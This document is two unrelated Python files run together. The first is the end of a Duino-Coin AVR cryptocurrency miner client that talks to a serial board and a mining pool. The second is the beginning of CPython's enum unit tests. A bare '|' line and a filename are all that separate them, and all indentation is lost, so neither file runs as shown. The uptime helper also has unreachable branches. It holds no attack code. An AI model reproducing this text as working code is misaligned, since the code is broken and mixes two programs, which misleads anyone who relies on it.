pretty_print('sys' + port_num(com),
f"Closed COM port {com}", 'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=float(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: " + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
while True:
try:
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ 'AVR')
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
retry_counter += 1
continue
try:
computetime = round(int(result[1], 2) / 1000000, 3)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(rig_identifier)
+ Settings.SEPARATOR
+ str(result[2]))
responsetimetart = now()
feedback = Client.recv(s, 64)
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {feedback}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
if feedback == 'GOOD':
shares[0] += 1
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
elif feedback == 'BLOCK':
shares[0] += 1
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
else:
shares[1] += 1
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping)
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
hashrate, uptime)
start_time = time()
def periodic_report(start_time, end_time, shares,
hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3') + get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string('uptime_seconds')
elif uptime == 60:
return str(round(uptime // 60)) + get_string('uptime_minute')
elif uptime >= 60:
return str(round(uptime // 60)) + get_string('uptime_minutes')
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string('uptime_hour')
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string('uptime_hours')
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
thrThread(target=mine_avr,
args=(port, threadid,
fastest_pool)).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
